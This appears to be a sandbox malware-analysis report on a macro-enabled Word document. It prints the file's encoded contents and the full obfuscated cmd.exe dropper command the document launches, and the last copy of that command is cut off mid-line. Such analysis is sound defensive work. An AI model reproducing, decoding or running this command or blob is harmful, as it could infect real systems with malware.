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 AE8AUABFAE4AAABAAAAL8AQAAAASNFZ4
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 08:06:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 08:06:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3056"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0478911415250.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3488c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4044CmD /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,